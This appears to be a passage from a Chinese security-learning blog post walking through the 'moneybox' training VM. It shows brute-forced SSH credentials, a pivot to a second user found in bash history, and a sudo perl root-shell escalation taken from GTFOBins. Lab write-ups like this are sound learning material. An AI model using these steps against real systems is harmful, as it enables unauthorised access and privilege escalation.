<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704383732564-15a5637c-10cb-4153-8c01-26e2647d8f85.png" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704383770933-01ebf4ac-a701-47b7-aa31-ac805de124c7.png" alt="image.png"><br>爆出用户名：renu       密码：987654321</p>
<h3 id="获取第一个flag"><a href="#获取第一个flag" class="headerlink" title="获取第一个flag"></a>获取第一个flag</h3><p>1.ssh登录     <code>ssh renu@192.168.0.129</code><br>  ls     查看文件<br> cat   user1.txt    查看user1.txt<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704384273472-943465b7-2cdd-47b0-9133-394b642110f2.png" alt="image.png"></p>
<h3 id="获取第二个flag"><a href="#获取第二个flag" class="headerlink" title="获取第二个flag"></a>获取第二个flag</h3><p>1.查看renu用户的输入命令历史记录<br><code>cat .bash_history</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704434828136-22510d78-ff7f-412d-a6bd-cf46d86e95f7.png" alt="image.png"></p>
<p>2.发现renu远程登录了用户lily的电脑。所以我们尝试去登录lily用户<br><code>ssh lily@192.168.56.101</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704435074467-d0154aa6-339a-4a48-8b50-f0746a1eaed7.png" alt="image.png"><br>登录成功！<br>3.输入以下命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ls</span><br><span class="line">cat user2.txt</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704435586700-ab82fefa-4bb8-45c2-a279-f86692b44a83.png" alt="image.png"></p>
<h3 id="获取第三个flag"><a href="#获取第三个flag" class="headerlink" title="获取第三个flag"></a>获取第三个flag</h3><p>1.命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sudo -l                                      //显示当前用户可以执行的命令列表</span><br><span class="line">sudo perl -e &#x27;exec &quot;/bin/sh&quot;;&#x27;</span><br><span class="line">id                                          //显示用户id,组id</span><br><span class="line"># cd /root</span><br><span class="line"># ls -al</span><br><span class="line"># cat .root.txt</span><br></pre></td></tr></table></figure>

<p>第二个命令需要去GTFOBins 网站（GTFOBins 是一个开源项目，旨在为渗透测试人员和安全研究人员提供一个易于使用的工具）寻找<br>（1）在该网站的搜索框搜索perl（perl是脚本语言）点击第2个箭头的perl，找到sudo<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704436575644-e9fca066-b3ed-403c-adbf-7f11c0131c9d.png" alt="image.png"><br>（2）复制sudo下面的命令，粘贴到kali<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704439185033-a4cf177c-1e3a-4b37-b0aa-c82d8128e01c.png" alt="image.png">      </p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/">基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2024-01-08, 09:12:08</p>
        <p><span>Updated:</span>2024-01-08, 09:20:39</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/" title="基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox">http://example.com/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/</a>
            <span class="copy-path" data-clipboard-text="From http://example.com/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2024/01/08/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%8C%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%9A%84%E4%BD%BF%E7%94%A8/">
                    信息收集，小米范的使用
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2024/01/08/%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%AD%90%E5%9F%9F%E5%90%8D%E8%8E%B7%E5%8F%96%EF%BC%8C%E7%99%BE%E5%BA%A6%E5%92%8C%E8%B0%B7%E6%AD%8C%E6%90%9C%E7%B4%A2%E8%AF%AD%E6%B3%95/">
                    域名，子域名获取，百度和谷歌搜索语法
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.</span> <span class="toc-text">基于表单的暴力破解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Burp%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">1.1.</span> <span class="toc-text">Burp的使用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Yakit%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">1.2.</span> <span class="toc-text">Yakit的使用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%88on-server%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">验证码绕过（on server）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Yakit%E7%9A%84%E4%BD%BF%E7%94%A8-1"><span class="toc-number">2.1.</span> <span class="toc-text">Yakit的使用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%88on-client%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">验证码绕过（on client）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BA%E7%9A%84%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">4.</span> <span class="toc-text">攻破靶机的环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BAmoneybox%E5%AE%89%E8%A3%85%E5%92%8C%E8%AE%BE%E7%BD%AE"><span class="toc-number">4.1.</span> <span class="toc-text">靶机moneybox安装和设置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kali%E6%9C%BA%E8%AE%BE%E7%BD%AE"><span class="toc-number">4.2.</span> <span class="toc-text">kali机设置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox"><span class="toc-number">5.</span> <span class="toc-text">攻破靶机moneybox</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E7%AB%AF%E5%8F%A3"><span class="toc-number">5.1.</span> <span class="toc-text">扫描端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.2.</span> <span class="toc-text">FTP协议的利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96trytofind-jpg"><span class="toc-number">5.3.</span> <span class="toc-text">获取trytofind.jpg</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E9%9A%90%E8%97%8F%E6%96%87%E4%BB%B6"><span class="toc-number">5.4.</span> <span class="toc-text">获取隐藏文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E7%9B%AE%E5%BD%95"><span class="toc-number">5.5.</span> <span class="toc-text">扫描目录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%88%86%E7%A0%B4%E5%AF%86%E7%A0%81"><span class="toc-number">5.6.</span> <span class="toc-text">爆破密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%AC%AC%E4%B8%80%E4%B8%AAflag"><span class="toc-number">5.7.</span> <span class="toc-text">获取第一个flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%AC%AC%E4%BA%8C%E4%B8%AAflag"><span class="toc-number">5.8.</span> <span class="toc-text">获取第二个flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%AC%AC%E4%B8%89%E4%B8%AAflag"><span class="toc-number">5.9.</span> <span class="toc-text">获取第三个flag</span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-6 i,
        .toc-level-6 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox　| Hexo　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2024/01/08/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%8C%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%9A%84%E4%BD%BF%E7%94%A8/" title="Pre: 信息收集，小米范的使用">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2024/01/08/%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%AD%90%E5%9F%9F%E5%90%8D%E8%8E%B7%E5%8F%96%EF%BC%8C%E7%99%BE%E5%BA%A6%E5%92%8C%E8%B0%B7%E6%AD%8C%E6%90%9C%E7%B4%A2%E8%AF%AD%E6%B3%95/" title="Next: 域名，子域名获取，百度和谷歌搜索语法">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/CDN%E4%BB%8B%E7%BB%8D%E5%8F%8A%E7%BB%95%E8%BF%87,%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/">CDN介绍及绕过,支付逻辑漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E6%95%99%E8%82%B2SRC%E5%88%86%E6%9E%90,%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E/">教育SRC分析,弱口令漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%8C%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%9A%84%E4%BD%BF%E7%94%A8/">信息收集，小米范的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/">基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%AD%90%E5%9F%9F%E5%90%8D%E8%8E%B7%E5%8F%96%EF%BC%8C%E7%99%BE%E5%BA%A6%E5%92%8C%E8%B0%B7%E6%AD%8C%E6%90%9C%E7%B4%A2%E8%AF%AD%E6%B3%95/">域名，子域名获取，百度和谷歌搜索语法</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/06/%E6%B8%97%E9%80%8F%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B%20,web%E6%89%93%E7%82%B9%EF%BC%8C%E9%9D%B6%E6%9C%BA%E6%94%BB%E7%A0%B4/">渗透基本流程 ,web打点，靶机攻破</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/01/%E5%AE%89%E5%85%A8%E7%8B%97%E7%9A%84%E5%AE%89%E8%A3%85%EF%BC%8CWAF%E7%BB%95%E8%BF%87%EF%BC%8CSQL%E6%B3%A8%E5%85%A5Oracle%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8CBurp%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8/">安全狗的安装，WAF绕过，SQL注入Oracle数据库，Burp的安装与使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/01/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E7%BB%95%E8%BF%87%20,Tamper%E8%84%9A%E6%9C%AC/">宽字节注入，堆叠注入，绕过 ,Tamper脚本</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/25/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%9B%B2%E6%B3%A8%E5%9E%8B,%E6%8A%A5%E9%94%99%E5%9E%8B%EF%BC%8Cpostman%E8%BD%AF%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/">SQL注入之盲注型,报错型，postman软件的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/">布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/23/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%81%94%E5%90%88%E5%9E%8B/">SQL注入之联合型</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/23/axios%E5%92%8Capi.php%E7%9A%84%E4%BD%BF%E7%94%A8/">axios和api.php的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/">文件操作</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E7%94%A8vue2%E5%86%99%E7%BD%91%E9%A1%B5/">用vue2写网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E7%94%A8vue%E5%86%99%E7%BD%91%E9%A1%B5/">用vue写网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/14/PHP%E8%B7%B3%E8%BD%AC%E9%A1%B5%E9%9D%A2%EF%BC%8CPHP%E5%86%99%E8%AF%84%E8%AE%BA%E5%8C%BA%E5%92%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%A1%86/">PHP跳转页面，PHP写评论区和文件上传框</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/14/postman%E3%80%81phpstudy%E5%AE%89%E8%A3%85%EF%BC%8Cphp%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95%EF%BC%8Cphp%E8%BF%9E%E6%8E%A5%E6%95%B0%E6%8D%AE%E5%BA%93/">postman、phpstudy安装，php基本语法，php连接数据库</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/12/form%E8%A1%A8%E5%8D%95%EF%BC%8C%E5%86%99%E6%94%BF%E5%BA%9C%E7%BD%91%E9%A1%B5/">form表单，写政府网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/vue3%E7%9A%84%E4%BD%BF%E7%94%A8/">vue3的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%AD%97%E7%AC%A6%E9%9B%86%E5%92%8C%E7%BC%96%E7%A0%81/">字符集和编码</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%AD%97%E5%85%B8/">字典</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%88%97%E8%A1%A8%EF%BC%8C%E5%85%83%E7%BB%84%EF%BC%8Cset%E9%9B%86%E5%90%88/">列表，元组，set集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%BE%AA%E7%8E%AF%E8%AF%AD%E5%8F%A5,%E5%AD%97%E7%AC%A6%E4%B8%B2/">循环语句,字符串</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E7%AC%AC%E4%B8%80%E4%B8%AApython%E7%A8%8B%E5%BA%8F%EF%BC%8C%E7%94%A8%E6%88%B7%E4%BA%A4%E4%BA%92%EF%BC%8Cif%E6%9D%A1%E4%BB%B6%E5%88%A4%E6%96%AD/">第一个python程序，用户交互，if条件判断</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/06/%E5%A4%8D%E7%9B%98Linux%E5%91%BD%E4%BB%A4%EF%BC%8C%E5%AE%89%E8%A3%85%E5%91%BD%E4%BB%A4%E5%92%8C%E5%B7%A5%E5%85%B7%EF%BC%8CHTML5%E4%BB%8B%E7%BB%8D,%E5%86%99%E4%B8%80%E4%B8%AA%E7%BD%91%E9%A1%B5/">复盘Linux命令，安装命令和工具，HTML5介绍,写一个网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/05/%E4%BB%8B%E7%BB%8D%E8%B7%AF%E7%94%B1%EF%BC%8C%E4%BB%A3%E7%90%86%E5%92%8COSI%E6%A8%A1%E5%9E%8B%EF%BC%8CVMware%20workstation%EF%BC%8Cwireshark/">介绍路由，代理和OSI模型，VMware workstation，wireshark</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/04/%E5%A4%8D%E7%9B%98%E4%B8%8A%E5%91%A8%E7%9F%A5%E8%AF%86&%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">复盘上周知识&网络基础知识</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/Linux%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4%EF%BC%8Cssh%E7%99%BB%E5%BD%95/">Linux的基本命令，ssh登录</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E5%9C%A8%E7%89%A9%E7%90%86%E6%9C%BA%E4%B8%8B%E8%BD%BD%E8%BD%AF%E4%BB%B6%EF%BC%8C%E5%88%A9%E7%94%A8github%E6%90%AD%E5%BB%BAhexo%E5%8D%9A%E5%AE%A2%EF%BC%8C%E9%AA%8C%E8%AF%81%E5%9B%BE%E7%89%87%E4%B8%8A%E4%BC%A0%E5%92%8C%E6%9B%B4%E6%8D%A2%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98/">在物理机下载软件，利用github搭建hexo博客，验证图片上传和更换博客主题</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E7%A4%BE%E5%B7%A5%E5%BA%93%E6%9F%A5%E8%AF%A2%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%EF%BC%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%EF%BC%8C%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB%EF%BC%8Cflash%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC%EF%BC%8C%E7%BD%91%E7%AB%99%E6%8F%92%E5%85%A5js%E7%BD%91%E9%A1%B5/">社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2016-2024 Tangxianshen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
             tags: ".article-tag a", 
             categories: ".article-category a, a.tag-list-link", 
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>